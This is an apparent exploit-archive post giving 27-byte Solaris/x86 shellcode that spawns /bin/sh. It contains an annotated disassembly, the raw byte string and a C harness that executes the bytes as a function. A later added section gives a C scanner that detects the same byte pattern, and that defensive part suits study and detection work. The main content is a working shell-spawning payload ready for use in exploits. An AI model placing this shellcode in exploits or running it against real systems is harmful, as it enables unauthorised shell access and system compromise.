
solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes

Posted on 20 May 2010

/*
Title:   Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
Author:  Jonathan Salwan <submit AT shell-storm.org>
Web:     http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm
Date:    2010-05-19
Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris

section .text

0x8048074: 31 c0             xorl   %eax,%eax
0x8048076: 50                pushl  %eax
0x8048077: 68 6e 2f 73 68    pushl  $0x68732f6e     ; "n/sh"
0x804807c: 68 2f 2f 62 69    pushl  $0x69622f2f     ; "//bi"
0x8048081: 89 e3             movl   %esp,%ebx       ; ebx -> "//bin/sh"
0x8048083: 50                pushl  %eax
0x8048084: 53                pushl  %ebx
0x8048085: 89 e2             movl   %esp,%edx       ; edx -> { ebx, NULL }
0x8048087: 50                pushl  %eax
0x8048088: 52                pushl  %edx
0x8048089: 53                pushl  %ebx
0x804808a: b0 3b             movb   $0x3b,%al       ; syscall number 0x3b
0x804808c: 50                pushl  %eax
0x804808d: cd 91             int    $0x91
*/

#include <stdio.h>
#include <string.h>   /* strlen */

char sc[] = "\x31\xc0\x50\x68\x6e\x2f"
            "\x73\x68\x68\x2f\x2f\x62"
            "\x69\x89\xe3\x50\x53\x89"
            "\xe2\x50\x52\x53\xb0\x3b"
            "\x50\xcd\x91";

int main(void)
{
    /* The array contains no NUL byte, so strlen() reports all 27 bytes. */
    fprintf(stdout, "Length: %d\n", (int)strlen(sc));
    /* Call the byte array as a function. */
    (*(void(*)()) sc)();
    return 0;
}

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-05-20]
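A detection-side view of the listing above, as an added example that is not part of the original post: a small C scanner that flags the byte pattern the disassembly shows (a run of `pushl $imm32` building a string that contains `/sh`, followed by `movb $0x3b,%al` and `int $0x91`). The function names, the 64-byte string buffer and the `window` parameter are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* The 27 bytes from the listing above, used only as scanner input. */
static const unsigned char page_bytes[] = {
    0x31,0xc0,0x50,0x68,0x6e,0x2f,0x73,0x68,0x68,0x2f,0x2f,0x62,0x69,0x89,
    0xe3,0x50,0x53,0x89,0xe2,0x50,0x52,0x53,0xb0,0x3b,0x50,0xcd,0x91 };

/* Rebuild the string left on the stack by a run of `pushl $imm32` (0x68)
 * starting at buf[i]. Each later push sits at a lower address, so its four
 * bytes are prepended. Returns the number of code bytes consumed. */
static size_t stack_string(const unsigned char *buf, size_t len, size_t i,
                           char *out, size_t outsz)
{
    size_t used = 0, n = 0;
    while (i + used + 5 <= len && buf[i + used] == 0x68 && n + 4 < outsz) {
        memmove(out + 4, out, n);              /* make room at the front */
        memcpy(out, buf + i + used + 1, 4);    /* imm32 bytes as stored */
        n += 4;
        used += 5;
    }
    out[n] = '\0';
    return used;
}

/* Offset of the first push run that builds a string containing "/sh" and is
 * followed within `window` bytes by movb $0x3b,%al (b0 3b) and then
 * int $0x91 (cd 91); -1 if none. A heuristic, not a disassembler. */
long find_execve_sh(const unsigned char *buf, size_t len, size_t window)
{
    char s[64];
    for (size_t i = 0; i < len; i++) {
        size_t used = stack_string(buf, len, i, s, sizeof s);
        if (!used || !strstr(s, "/sh")) continue;
        size_t end = i + used + window < len ? i + used + window : len;
        int sysnum = 0;
        for (size_t j = i + used; j + 1 < end; j++) {
            if (buf[j] == 0xb0 && buf[j + 1] == 0x3b) sysnum = 1;
            if (sysnum && buf[j] == 0xcd && buf[j + 1] == 0x91) return (long)i;
        }
    }
    return -1;
}

int main(void)
{
    printf("match at offset %ld\n", find_execve_sh(page_bytes, sizeof page_bytes, 32));
    return 0;
}
```

Because it matches raw bytes rather than decoded instructions, the scanner can fire on data that happens to contain the same sequence, so treat a hit as a lead to triage rather than a verdict.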

 
